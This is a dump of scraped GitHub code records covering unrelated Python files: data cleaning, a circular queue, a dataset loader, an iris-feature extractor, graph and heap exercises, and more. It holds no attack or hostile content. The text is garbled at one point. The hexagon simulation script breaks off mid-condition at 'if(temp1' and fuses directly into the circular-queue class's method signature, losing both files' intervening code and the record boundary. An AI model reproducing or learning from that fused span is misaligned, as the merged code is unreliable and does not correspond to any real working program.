+{"seq_id":"29368914953","text":"import pandas as pd\nimport numpy as np\n\ndef processdata(datafile):\n df = pd.read_csv(datafile)\n df = df[df['task'] == 'response']\n df = df[['data_type', 'L1', 'Excerpt1', 'L2', 'Excerpt2', 'Stimulus1', 'Stimulus2', 'time_elapsed', 'timestamp', 'rt', 'response']]\n \n for i, row in df.iterrows():\n df.at[i, 'response'] = int(row['response']) + 1\n \n df = df.astype({'Excerpt1': int, 'Excerpt2': int})\n df.index = np.arange(1, len(df) + 1)\n df.index.name = \"trial number\"\n df.to_csv(datafile[:-4] + \"_cleaned.csv\")\n\nif __name__ == \"__main__\":\n processdata(\"subj_2_trialList_3_data.csv\")\n","repo_name":"yejoo104/universality","sub_path":"data/processdata.py","file_name":"processdata.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9273541641","text":"import hexagon\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport user\nimport sys\n\nr = float(sys.argv[1])\ninner = float(sys.argv[2])\npower = 80e-4\n\ncells = np.array([])\ncells = np.append(cells,[hexagon.Hexagon(np.array([0.,0.]),r,1,4,0,inner)])\n\npoints = np.array([[2,2],[1.5,2],[1,2],[0.5,2],[0,2],[-0.5,2],[-1,2],[-1.5,2],[-2,2],[-2.2,1.3],[-2.1,0],[-2,-0.7],[-2,-2],[0,-2],[2,-2],[2,-0.1],[2.1,0]])\nindex = 1\n\n\nlisting = np.array([[0,0],[0,0]])\n\ndoing = True\n\nwhile(doing):\n doing = False\n for k in points:\n there = False\n for p in listing:\n if(np.array_equal(k,p)):\n there = True\n #print(k,p)\n if(not there):\n doing = True\n #print('in?')\n distance = 1e6\n cell = np.NaN\n for j in range(cells.shape[0]):\n \n closed,dist = cells[j].closest(k)\n\n temp1 = np.dot(dist[0],dist[0])\n if(temp1 bool:\n \"\"\"\n Insert an element into the circular queue. Return true if the operation is successful.\n \"\"\"\n if (self.isEmpty()):\n self.head = 0\n self.tail = 0\n elif (self.isFull()):\n return;\n else:\n self.tail = (self.tail + 1) % self.capacity\n self.array[self.tail] = value\n\n return True\n\n def deQueue(self) -> bool:\n \"\"\"\n Delete an element from the circular queue. Return true if the operation is successful.\n \"\"\"\n if (self.isEmpty()):\n return\n elif (self.head == self.tail):\n self.head = -1\n self.tail = -1\n else:\n self.head = (self.head + 1) % self.capacity\n\n return True\n\n def Front(self) -> int:\n \"\"\"\n Get the front item from the queue.\n \"\"\"\n if (self.isEmpty()):\n return -1\n\n return self.array[self.head]\n\n def Rear(self) -> int:\n \"\"\"\n Get the last item from the queue.\n \"\"\"\n if (self.isEmpty()):\n return -1\n return self.array[self.tail]\n\n def isEmpty(self) -> bool:\n \"\"\"\n Checks whether the circular queue is empty or not.\n \"\"\"\n if (self.head == -1 and self.tail == -1):\n return True\n return False\n\n def isFull(self) -> bool:\n \"\"\"\n Checks whether the circular queue is full or not.\n \"\"\"\n if (self.head == ((self.tail + 1) % self.capacity)):\n return True\n return False","repo_name":"Melinal23/Stack-And-Queues","sub_path":"MyCircularQueue.py","file_name":"MyCircularQueue.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43060277888","text":"class Weapon:\n def __init__(self, name, lvl, attack_bonus, damage):\n self.name = name\n self.lvl = lvl\n self.attack_bonus = attack_bonus\n self.damage = damage\n\n\nbattleaxe = Weapon(\"battleaxe\", 1, 1, [1, 8, 2]) # where [1, 8, 2] is 1d8+2\nscimitar = Weapon(\"scimitar\", 1, 3, [1, 6, 1])\nsickle = Weapon(\"sickle\", 1, 5, [1, 4, 1])\nshortsword = Weapon(\"shortsword\", 3, 3, [1, 6, 2])\nmaul = Weapon(\"maul\", 3, 0, [2, 6, 1])\nwar_pick = Weapon(\"war pick\", 3, 2, [1, 8, 0])\nlance = Weapon(\"lance\", 5, 2, [1, 12, 0])\nrapier = Weapon(\"rapier\", 5, 4, [1, 8, 2])\nlongsword = Weapon(\"longsword\", 7, 5, [1, 8, 3])\ngreatsword = Weapon(\"greatsword\", 7, 2, [2, 6, 3])\nhalebard = Weapon(\"halebard\", 9, 5, [1, 10, 5])\ngreataxe = Weapon(\"greataxe\", 9, 3, [1, 12, 5])\n","repo_name":"Palmofff/dungeon-crawler-study-task","sub_path":"equipment/weapons.py","file_name":"weapons.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29903681576","text":"import os\nimport numpy as np\nimport json\nimport joblib\n\ndef init():\n print(\"This is init\")\n global model\n model_path = os.path.join(os.getenv('AZUREML_MODEL_DIR'),'model.pkl')\n model = joblib.load(model_path)\n\ndef run(data):\n test = json.loads(data)\n print(f\"received data {test}\")\n try:\n data = np.array(json.loads(data))\n result = model.predict(data)\n return result.tolist()\n except Exception as err:\n return str(err)","repo_name":"arunanshupandey/nd00333-capstone","sub_path":"starter_file/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"35626449355","text":"import requests\r\nimport api_const\r\nimport csv\r\nimport logging\r\nimport sys\r\nsys.path.insert(1, '../util/')\r\nsys.path.insert(2, \"C:/OscarScripts/util\")\r\nfrom calendar_datetime import get_today_date_yyyymmdd\r\nfrom calendar_datetime import get_today_wkday\r\nimport os\r\n\r\n\r\ndef put_demographic(headers, instance):\r\n # mdstaff_id should be passed as a hash\r\n wkday = get_today_wkday()\r\n dir_path = os.path.dirname(os.path.realpath(__file__))\r\n log_file = dir_path + api_const.log_file\r\n\r\n logging.basicConfig(\r\n filename = log_file, \\\r\n filemode = 'a', \\\r\n level = logging.info, \\\r\n format = \"%(levelname)s %(name)s %(asctime)s %(lineno)s - %(message)s \")\r\n logger = logging.getLogger(__name__)\r\n logger.info(wkday + \". Starting PUT DEMOGRAPHIC API\")\r\n \r\n \r\n with open (\"output_final2.txt\", \"r\") as input_fh:\r\n csv_reader = csv.reader(input_fh, delimiter = \"|\")\r\n for row in csv_reader:\r\n providerid = row[5]\r\n firstname = row[3].strip().title()\r\n middlename = row[4].strip().title()\r\n lastname = row[2].strip().title()\r\n\r\n api_url = api_const.api_url + instance + \"/demographic/\" + providerid\r\n \r\n logger.info(wkday + \". API URL: \" + api_url)\r\n \r\n data = '{\"FirstName\":\"' + firstname + '\", \"MiddleName\":\"' + middlename + '\",\"LastName\":\"' + lastname + '\"}'\r\n print(data)\r\n \r\n try:\r\n response = requests.put(api_url, \\\r\n headers = headers, \\\r\n data = data, \\\r\n timeout = (250, 500))\r\n response.raise_for_status()\r\n \r\n except requests.exceptions.RequestException as err:\r\n logger.critical(wkday + \". OOps: Something Else: \" + str(err))\r\n logger.critical(wkday + \". \" + api_url)\r\n logger.critical(wkday + \". \" + data)\r\n continue\r\n \r\n except requests.exceptions.HTTPError as errh:\r\n logger.critical(wkday + \". Http Error: \" + str(errh))\r\n logger.critical(wkday + \". \" + api_url)\r\n logger.critical(wkday + \". \" + data)\r\n continue\r\n \r\n except requests.exceptions.ConnectionError as errc:\r\n logger.critical(wkday + \". Error Connecting: \" + str(errc))\r\n logger.critical(wkday + \". \" + api_url)\r\n logger.critical(wkday + \". \" + data)\r\n continue\r\n \r\n except requests.exceptions.Timeout as errt:\r\n logger.critical(wkday + \". Timeout Error: \" + str(errt))\r\n logger.critical(wkday + \". \" + api_url)\r\n logger.critical(wkday + \". \" + data)\r\n continue\r\n \r\n response_json = response.json()\r\n \r\n logger.info(\"Return code: \" + str(response.status_code))\r\n \r\n\r\n\r\ndef email_data():\r\n sccids_to_emails_hash = {}\r\n with open(\"SantaClara_66403_20200709-1002.txt\", \"r\") as input_fh:\r\n csv_reader = csv.reader(input_fh, delimiter = \"|\")\r\n for row in csv_reader:\r\n email = row[15]\r\n sccid = row[4]\r\n sccids_to_emails_hash[sccid] = email\r\n return providerids_to_lnames_hash, providerids_to_fnames_hash, providerids_to_mnames_hash\r\n\r\n\r\n\r\ndef main():\r\n\r\n put_demographic(headers, \\\r\n instance)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"ohur/mdstaff_public","sub_path":"api_put_demographic.py","file_name":"api_put_demographic.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74508612568","text":"import torch\nimport os\nfrom PIL import Image\nimport numpy as np\nfrom scipy.misc import imread, imresize\nimport codecs\nimport json\nimport cv2\nimport torch\nfrom scipy.special import comb as n_over_k\nimport scipy.io as sio\nfrom tqdm import tqdm\n# import unicode\nfrom .augs import PSSAugmentation, SythAugmentation, TestAugmentation\nfrom maskrcnn_benchmark.structures.bounding_box import BoxList\n# from maskrcnn_benchmark.structures.boxlist_ops import box_xyxy_to_xyxy\n# from .utils import *\n# from maskrcnn_benchmark.structures.segmentation_mask import SegmentationMask, Polygons\n# from maskrcnn_benchmark.utils.rec_util import LabelMap\n\ndef text_list_generate(text):\n word_list = []\n for part in text:\n part_word_list = part.strip().replace(' ', '\\n').split('\\n')\n for i in range(len(part_word_list)-1, -1, -1):\n if part_word_list[i] == '':\n part_word_list.remove('')\n word_list += part_word_list\n return word_list\n\ndef filter_word(text,chars='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'):\n char_list = [c for c in text if c in chars]\n return \"\".join(char_list)\n\ndef load_ann(img_path, filter_tag=False):\n txt_folder = \"/home/wanghao/datasets/SynthText/Text_GT\"\n gt = os.path.join(txt_folder, img_path.split('/')[-1].replace('.jpg', '.txt').replace('.png', '.txt').replace('.gif', '.txt'))\n # print(gt,img_path)\n # gt = unicode(gt, 'utf-8')#gt.decode('utf-8')\n item = {}\n item['polys'] = []\n item['tags'] = []\n item['texts'] = []\n item['gt_path'] = gt\n item['img_path'] = img_path\n # print(gt)\n reader = codecs.open(gt,encoding='utf-8').readlines()\n # reader = open(gt).readlines()\n for line in reader:\n parts = line.strip().split(',')\n if filter_tag:\n # label = 'fakelabel'\n label = parts[-1]\n else:\n label = parts[-1]\n label = filter_word(label)\n if len(label)<3:\n continue\n if label == '###':\n continue\n line = [i.strip('\\ufeff').strip('\\xef\\xbb\\xbf') for i in parts]\n # if filter_tag:\n # xmin, ymin, xmax, ymax = list(map(float, line[:4]))\n # item['polys'].append([[xmin, ymin], [xmax, ymin], [xmax, ymax], [xmin, ymax]])\n # else:\n x1, y1, x2, y2, x3, y3, x4, y4 = list(map(float, line[:8]))\n item['polys'].append(get_ordered_polys(np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]])))\n item['texts'].append(label.lower())\n if label == '###':\n item['tags'].append(True)\n else:\n item['tags'].append(False)\n # if filter_tag:\n # if len(item['polys'])==0:\n # return None, None, None\n item['polys'] = np.array(item['polys'], dtype=np.float32)\n item['tags'] = np.array(item['tags'], dtype=np.bool)\n item['texts'] = np.array(item['texts'], dtype=np.str)\n \n return item['img_path'], item['polys'], item['texts']\n \ndef get_ordered_polys(cnt):\n points = list(cnt)\n ps = sorted(points,key = lambda x:x[0])\n\n if ps[1][1] > ps[0][1]:\n px1 = ps[0][0]\n py1 = ps[0][1]\n px4 = ps[1][0]\n py4 = ps[1][1]\n else:\n px1 = ps[1][0]\n py1 = ps[1][1]\n px4 = ps[0][0]\n py4 = ps[0][1]\n if ps[3][1] > ps[2][1]:\n px2 = ps[2][0]\n py2 = ps[2][1]\n px3 = ps[3][0]\n py3 = ps[3][1]\n else:\n px2 = ps[3][0]\n py2 = ps[3][1]\n px3 = ps[2][0]\n py3 = ps[2][1]\n\n return np.array([[px1, py1], [px2, py2], [px3, py3], [px4, py4]])\n\nclass SynthText(object):\n def __init__(self, img_folder):\n self.generate_information(img_folder)\n self.difficult_label = \"###\"\n def generate_information(self, img_folder):\n gt_mat = os.path.join(img_folder, 'gt.mat')\n s_data = sio.loadmat(gt_mat)\n names = s_data['imnames']\n name = names[0]\n image_path_list = [os.path.join(img_folder, name_i[0]) for name_i in name]\n gt_folder = \"/home/wanghao/datasets/SynthText/Text_GT\"\n gt_path_list = [os.path.join(gt_folder, gt) for gt in os.listdir(gt_folder)]\n self.image_path_list = sorted(image_path_list)\n self.gt_path_list = sorted(gt_path_list)\n self.filter_tag = True\n self.sample_num = len(self.image_path_list)\n # import pdb\n # pdb.set_trace()\n def len(self):\n return self.sample_num\n def getitem(self,index):\n img_path, polys, texts = load_ann(self.image_path_list[index], self.filter_tag)\n # if img_path == None:\n # index = 0\n # img_path, polys, texts = load_ann(self.image_path_list[index], self.filter_tag)\n return img_path, polys, texts\n\nclass SynthTextDataset(torch.utils.data.Dataset):\n def __init__(self, data_dir, transforms=None, is_train=True, augment=None):\n super().__init__()\n self.dataset = SynthText(data_dir)\n # print(self.dataset.len())\n # print(is_train)\n self.is_train = is_train\n self.transforms = transforms\n self.augment = eval(augment)()\n\n def __len__(self):\n return self.dataset.len()\n\n def __getitem__(self, index):\n if self.is_train:\n polys = []\n while len(polys) ==0:\n img_path, polys, texts = self.dataset.getitem(index)\n index = np.random.randint(0,len(self))\n img = imread(img_path, mode=\"RGB\")\n assert len(polys)==len(texts),print(polys,texts)\n aug_img, polys, tags = self.augment(img, polys, texts)\n boxes = []#[[np.min(poly[:,0]), np.min(poly[:,1]), np.max(poly[:,0]), np.max(poly[:,1])] for poly in polys]\n # # boxes = np.array(boxes).reshape([-1,4])\n # order_polys = []\n # boundarys = []\n for poly in polys:\n boxes.append([np.min(poly[:,0]), np.min(poly[:,1]), np.max(poly[:,0]), np.max(poly[:,1])])\n # boundarys.append(pts_expand)\n # order_polys.append(get_ordered_polys(poly))\n # cv2.drawContours(aug_img, pts_expand.reshape([1,-1,2]).astype(np.int32),-1,color=(255,0,0),thickness=1)\n # cv2.imwrite(os.path.join('vis',os.path.basename(path)), aug_img[:,:,(2,1,0)])\n boxes = np.array(boxes).reshape([-1,4])\n # order_polys = np.array(order_polys).reshape([-1,8])\n # boundarys = np.array(boundarys).reshape([-1,NUM_POINT*4])\n image = Image.fromarray(aug_img.astype(np.uint8)).convert('RGB')\n\n boxlist = BoxList(boxes, image.size, mode=\"xyxy\")\n # boxlist.add_field('polys',torch.tensor(order_polys))\n # boxlist.add_field('boundarys',torch.tensor(boundarys))\n boxlist.add_field('labels',torch.tensor([-1 if text==self.dataset.difficult_label else 1 for text in tags]))\n boxlist.add_field('texts',tags)\n if self.transforms:\n image, boxlist = self.transforms(image, boxlist)\n # return the image, the boxlist and the idx in your dataset\n return image, boxlist, index\n else:\n img_path, polys, texts = self.dataset.getitem(index)\n img = imread(img_path, mode=\"RGB\")\n aug_img, _, _ = self.augment(img)\n image = Image.fromarray(aug_img.astype(np.uint8)).convert('RGB')\n boxlist=None\n if self.transforms:\n image,_ = self.transforms(image, boxlist)\n # return the image, the boxlist and the idx in your dataset\n return image, None, index\n\n def get_img_info(self, index):\n if self.is_train:\n return {\"path\":\"none\", \"height\": 768, \"width\": 1280}\n path, _, _ = self.dataset.getitem(index)\n size = Image.open(path).size\n # size = [1280,768]\n return {\"path\":path, \"height\": size[1], \"width\": size[0]}","repo_name":"lanfeng4659/STR-TDSL","sub_path":"maskrcnn_benchmark/data/datasets/synthtext800k.py","file_name":"synthtext800k.py","file_ext":"py","file_size_in_byte":7902,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"31"} +{"seq_id":"41891785019","text":"\"\"\"\nThis file describes work with I/O\n\"\"\"\nimport os\n\n\ndef write_to_file(filename: str):\n \"\"\"\n Prompts user for input and writes that input to a file.\n \"\"\"\n text = input(\"\\nPlease enter a text you want to write to the file: \")\n with open(filename, 'w') as f:\n f.write(text)\n f.write('\\n')\n\n\ndef append_to_file(filename: str):\n \"\"\"\n Prompts user for input and appends that input to a file.\n \"\"\"\n text = input(\"\\nPlease enter the text you want to append to the file: \")\n with open(filename, 'a') as f:\n f.write(text)\n f.write('\\n')\n\n\ndef print_file(filename: str):\n \"\"\"\n Prints file content to console.\n \"\"\"\n with open(filename, 'r') as f:\n for line in f.readlines():\n print(line, end='')\n print()\n\n\ndef delete_file(filename: str):\n \"\"\"\n Deletes file.\n \"\"\"\n os.remove(filename)\n\n\ndef get_line_count(filename: str):\n \"\"\"\n Returns amount of lines in file.\n \"\"\"\n with open(filename) as f:\n i = -1\n for i, l in enumerate(f):\n pass\n return i + 1\n\n\ndef replace_in_file(filename: str):\n \"\"\"\n Prompts user to enter line number and text. Than replaces existing text on this line with new text.\n \"\"\"\n line_number = int(input(\"Please enter the line number you want to update: \"))\n\n actual_lines_in_file = get_line_count(filename)\n if line_number > actual_lines_in_file:\n print(f\"File contains only {actual_lines_in_file} line{'s' if actual_lines_in_file > 1 else ''}.\")\n return\n\n text = input(\"Please enter the text that should replace that line: \")\n\n new_content = []\n with open(filename, 'r') as f:\n for i, line in enumerate(f):\n if i + 1 == line_number:\n new_content.append(f'{text}\\n')\n else:\n new_content.append(line)\n\n with open(filename, 'w') as f:\n f.writelines(new_content)\n\n\ndef take_note():\n \"\"\"\n Main function.\n \"\"\"\n filename = input(\"Please enter filename: \")\n\n if os.path.isfile(filename):\n option = input(\"\\nA) Read the file\\n\"\n \"B) Delete the file and start over\\n\"\n \"C) Append the file\\n\"\n \"D) Replace a single line\\n\"\n \"Above are few options what you can do with this file. Please choose one: \").lower()\n\n if option == 'a':\n print_file(filename)\n elif option == 'b':\n delete_file(filename)\n write_to_file(filename)\n elif option == 'c':\n append_to_file(filename)\n elif option == 'd':\n replace_in_file(filename)\n else:\n print(\"NOT SUPPORTED OPTION\")\n else:\n write_to_file(filename)\n return\n\n\ntake_note()\n","repo_name":"Zirochkaa/Python-Is-Easy-Homeworks","sub_path":"homework_8_io/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5379145256","text":"import sys\n\n\nclass Solution:\n def findSum(self, A, N):\n maxi = -sys.maxsize\n mini = sys.maxsize\n for i in range(len(A)):\n maxi = max(maxi, A[i])\n mini = min(mini, A[i])\n return maxi+mini\n","repo_name":"Tanujarora100/Striver-A-Z-DSA-SHEET","sub_path":"Arrays/2-minimum_max_Array.py","file_name":"2-minimum_max_Array.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41846095279","text":"from exception import NomeNaoLocalizado\nclass grafo(object):\n def __init__(self,arestas):\n self.adj = {}\n self.arestas = arestas\n self.relacao_amigos = {}\n self.adiciona_arestas(arestas)\n\n def cria_aresta(self, chave, valor):\n\n if chave not in list(self.adj.keys()):\n self.adj[chave] = valor\n else:\n if valor not in self.adj[chave]:\n self.adj[chave].append(valor) \n\n\n def adiciona_arestas(self, arestas):\n\n for chave, valor in arestas.items():\n self.cria_aresta(chave, valor)\n\n def lista_amigos(self,pessoa):\n if pessoa in list(self.adj.keys()):\n listagem_amigos = self.adj[pessoa]\n else:\n raise NomeNaoLocalizado\n \n return listagem_amigos\n \n def lista_nivel2(self,pessoa):\n listagem_nivel2 = []\n for chave, valor in self.arestas.items():\n if pessoa not in self.arestas[chave] and pessoa != chave and pessoa in list(self.adj.keys()):\n listagem_nivel2.append(chave)\n if listagem_nivel2 == []:\n raise NomeNaoLocalizado('Não existe nomes a serem listados')\n else:\n return listagem_nivel2\n\n def listar_grafo(self):\n return list(self.adj.keys())\n \n def adicionar_amigo(self,pessoa,amigo):\n if amigo not in list(self.adj.keys()):\n raise NomeNaoLocalizado('Amigo não localizado !')\n else:\n self.adj[amigo].append(pessoa)\n return f'Nome Adicionado'\n\n def __str__(self):\n return f'Grafo({self.adj})'","repo_name":"kaueabarros/Desafio","sub_path":"api/backend/grafo.py","file_name":"grafo.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21989050504","text":"from collections import deque\n\ndef bridge(graph, n):\n global total\n total = 2\n\n def dfs(adj, up, down, parent, start):\n global total\n for v in adj[start]:\n if up[v] == -1: # is not visited\n up[v] = total\n down[v] = total\n total += 1\n dfs(adj, up, down, start, v)\n down[start] = min(down[start], down[v]) \n\n elif v != parent:\n down[start] = min(down[start], down[v]) \n\n up = [-1]*n\n down = [-1]*n\n\n up[0] = 1\n down[0] = 1\n dfs(graph, up, down, 0, 0)\n for i in range(1, n):\n if up[i] == down[i]:\n return True\n return False\n\n\ndef is_connected(graph, n): \n vis = set()\n Q = deque()\n Q.append(0)\n while Q:\n u = Q.popleft()\n if u in vis:\n continue\n vis.add(u)\n for v in graph[u]:\n if v not in vis:\n Q.append(v) \n return len(vis) == n\n\n'''Read input with generator instead of input(), much faster'''\nimport sys\nitr = (line for line in sys.stdin.read().split('\\n')) # buffer\ninp = lambda: next(itr) # next iter\ndef ni(): return int(inp())\ndef nl_2(): return list(inp())\ndef nl(): return [int(tok) for tok in inp().split()]\n\n''' find bridges in graph. I.e. removal of single edge will produce a disconnected graph '''\n\nwhile True:\n p, c = nl()\n if not p and not c: break\n\n graph = {i:list() for i in range(p)}\n for a, b in [nl() for _ in range(c)]:\n graph[a].append(b)\n graph[b].append(a) \n \n if not is_connected(graph, p) or bridge(graph, p):\n print(\"Yes\")\n else:\n print(\"No\")\n","repo_name":"fr3632ho/kattis","sub_path":"birthday-party/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16391878742","text":"import os \r\nimport cv2 \r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport numpy as np\r\nimport sklearn\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\r\nfrom sklearn.neighbors import NearestCentroid as NC\r\nfrom scipy import signal\r\nimport scipy\r\n# This implementation follows the formula given in the paper\r\n# and follows similar logic in wikipedia's python implementation\r\n# of gabor filter. See https://en.wikipedia.org/wiki/Gabor_filter\r\n# That is, the origin of a gabor filter matrix is set to be its center\r\n# The kernel size is set to (9,9) as suggested\r\ndef ROI(image):\r\n return image[0:48,:]\r\n\r\n\r\ndef newfilter(x, y, sigma_x, sigma_y,f):\r\n return (1/(2*(math.pi)*sigma_x*sigma_y))*math.exp(-0.5*(x**2/sigma_x**2 + y**2/sigma_y**2)) * M(x,y,f)\r\n \r\n \r\n \r\ndef M(x,y,f):\r\n # f is the frequency of sinusoidal function\r\n return math.cos(2*math.pi*f*math.sqrt(x**2 + y**2))\r\n\r\n\r\n# compute kernel apply convolution\r\ndef getKernel(sigma_x, sigma_y,f):\r\n kernel = np.zeros((9,9))\r\n for i in range(0,9):\r\n for j in range(0,9):\r\n kernel[i,j] = newfilter(i-4, j-4, sigma_x, sigma_y,f)\r\n return kernel\r\n\r\n \r\n \r\ndef getConvolution(img, sigma_x, sigma_y,f):\r\n roi = ROI(img)\r\n kernel = getKernel(sigma_x, sigma_y,f)\r\n return scipy.signal.convolve2d(roi, kernel, mode='same', boundary='wrap')\r\n\r\n\r\n# extract statistics from 8x8 block\r\ndef get_feature_vector(image, sigma_x, sigma_y,f):\r\n img = getConvolution(image, sigma_x, sigma_y,f)\r\n len_row = len(img)\r\n len_col = len(img[0])\r\n rows = len_row//8\r\n cols = len_col//8\r\n feature_vector=[]\r\n for r in range(0,rows):\r\n for c in range(0,cols):\r\n mean = np.mean(np.abs(img[8*r:8*(r+1), 8*c:8*(c+1)]))\r\n sd = np.mean(np.abs((np.abs(img[8*r:8*(r+1), 8*c:8*(c+1)]) - mean)))\r\n feature_vector.append(mean)\r\n feature_vector.append(sd)\r\n return feature_vector\r\n\r\n# extract featue vectors with two\r\n# set of sigmax and sigmay as described in the\r\n# paper and glue them to a length 1536 vector\r\n\r\ndef feature_extractor(train,test):\r\n trainf=[]\r\n testf=[]\r\n for i in range(len(train)):\r\n # f is set to 1/sigmax\r\n fvec1=get_feature_vector(train[i], 4.5, 1.5,1/4.5)\r\n fvec2=get_feature_vector(train[i], 3, 1.5,1/3)\r\n trainf.append(fvec1+fvec2)\r\n for j in range(len(test)):\r\n fvec1=get_feature_vector(test[j], 4.5, 1.5,1/4.5)\r\n fvec2=get_feature_vector(test[j], 3, 1.5,1/3)\r\n testf.append(fvec1+fvec2)\r\n return [np.array(trainf),np.array(testf)]\r\n","repo_name":"Ted5834314/Iris-Detection-Python","sub_path":"FeatureExtraction.py","file_name":"FeatureExtraction.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37591031851","text":"\"\"\" Implementation of a binary heap using list \"\"\"\n\nclass Binary_Min_Heap():\n\n \"\"\" Define constructor function, takes an array with values as an\n argument \"\"\"\n def __init__(self, alist = []):\n self.build_min_heap(alist)\n\n \"\"\" Build heap from an array \"\"\"\n def build_min_heap(self, alist):\n self.heap = [0 for i in range(len(alist) + 1)]\n self.size = len(alist)\n for i in range(1, len(alist) + 1):\n self.heap[i] = alist[i - 1]\n\n \"\"\" Starting from the last node that has a child, start heapifying \"\"\"\n for i in range(self.size // 2, 0, -1):\n self.min_heapify(i)\n\n \"\"\" min_heapify function to enforce the min-heap property on a particular\n\telement of a heap \"\"\"\n def min_heapify(self, i):\n left = 2 * i\n right = 2 * i + 1\n smallest = i\n if (right <= self.size and self.heap[smallest] > self.heap[right]):\n smallest = right\n if (left <= self.size and self.heap[smallest] > self.heap[left]):\n smallest = left\n if (smallest != i):\n self.swap(self.heap, i, smallest)\n self.min_heapify(smallest)\n\n \"\"\" Funciton to swap two values in an array; takes indices \"\"\"\n def swap(self, alist, i, j):\n tmp = alist[i]\n alist[i] = alist[j]\n alist[j] = tmp\n\n \"\"\" Function to delete minimum value from a heap \"\"\"\n def delete_min(self):\n if (self.size == 0):\n return (-float(\"inf\"))\n x = self.heap[1]\n self.heap[1] = self.heap[self.size]\n self.size -= 1\n self.min_heapify(1)\n return x\n\n \"\"\" Heap Sort \"\"\"\n def heap_sort(self):\n out = [0 for i in range(self.size)]\n for i in range(self.size):\n out[i] = self.delete_min()\n\n \"\"\" Build heap again because we destroyed it above \"\"\"\n self.build_min_heap(out)\n return out\n\n\"\"\" ***********************************************************************\"\"\"\n\n\n\"\"\" A tester function \"\"\"\ndef tester():\n alist = [4, 2, 1, 5]\n h = Binary_Min_Heap(alist)\n print(h.heap_sort())\n print(h.heap_sort())\n alist = [0, 2, 1, 5, 1]\n h = Binary_Min_Heap(alist)\n print(h.heap_sort())\n\n\"\"\" Call the tester function \"\"\"\ntester()\n","repo_name":"goelhardik/programming","sub_path":"binary_heap/binary_min_heap.py","file_name":"binary_min_heap.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"656261227","text":"import tensorflow as tf\n\nIMG_WIDTH = 256\nIMG_HEIGHT = 256\nEPOCHS = 10\nBATCH_SIZE = 1\nDATA_ROOT_DIR = \"./Datasets/\"\nMODEL_FOLDER = \"summer2winter_yosemite/\"\nSAVED_MODEL_DIR = \"./Saved_Model/\"\nOUTPUT_DIR = \"./Outputs/\"\nSAVE_MODEL = True\nLOAD_MODEL = False\nLEARNING_RATE = 2e-4\nCYCLE_LOSS_WEIGHT = 10.0\nID_LOSS_WEIGHT = 0.0\n\n","repo_name":"ShuiFanZZ/CycleGAN","sub_path":"Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19987252039","text":"import os\nos.system(\"clear\")\n\nfrom GasolineVehicle import GasolineVehicle\nfrom HybridVehicle import HybridVehicle\n\nyarisAttributes = {}\nyarisAttributes[\"vin\"] = \"YARIS123000000\"\nyarisAttributes[\"wheels\"] = 4\nyarisAttributes[\"doors\"] = 4\nyarisAttributes[\"seats\"] = 4\n\ntandcAttributes = {}\ntandcAttributes[\"vin\"] = \"CHRYSLER123000\"\ntandcAttributes[\"wheels\"] = 4\ntandcAttributes[\"doors\"] = 4\ntandcAttributes[\"seats\"] = 7\n\npriusAttributes = {}\npriusAttributes[\"vin\"] = \"PRIUS123000000\"\npriusAttributes[\"wheels\"] = 4\npriusAttributes[\"doors\"] = 4\npriusAttributes[\"seats\"] = 5\npriusBattery = 2.4\n\nyaris = GasolineVehicle(yarisAttributes)\nprius = HybridVehicle(priusAttributes, priusBattery)\nchrysler = GasolineVehicle(tandcAttributes)\n\nprint(yaris.getVehicleStatus())\nprint()\nprint(prius.getVehicleStatus())\nprint()\nprint(chrysler.getVehicleStatus())\n\nchrysler.turn(\"left\")\nprint(chrysler.getVehicleStatus())\nchrysler.turn(\"straight\")\nprint(chrysler.getVehicleStatus())\n","repo_name":"ampise/python","sub_path":"OOP/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38277786073","text":"\"\"\"Testing functionality of the ergmpy package\"\"\"\n\nimport numpy as np\nfrom ergmpy import ergm\nimport networkx as nx\nimport time\nfrom scipy.special import binom\n\nprint(\"Testing ergmpy\")\n\np = 0.34 # parameter for ER random graphs\n\nn_nodes = 6\nn_samples = 10000\nseed = 1717\n\nprint(\"Using Networkx to sample undirected Erdos-Renyi random graphs with edge probability p = {}\".format(p))\nprint(\"Producing {} samples with {} nodes\".format(n_samples, 